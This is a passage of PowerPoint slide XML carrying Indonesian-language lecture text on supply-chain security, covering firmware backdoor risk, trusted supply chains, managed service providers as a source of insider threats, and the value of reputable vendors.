            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Siapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memodifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firmware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belakang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Membangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menolak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kejahatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memodifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipasok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Industri TI juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perdagangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (managed services provider/MSP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web. MSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>murah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalihdayakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelolanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dari </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pandang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> outsourcing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MSP. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. Bagi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> vendor yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>reputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>praktis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pasokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Pemerintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>militer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pengawasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ketat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Perhatian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
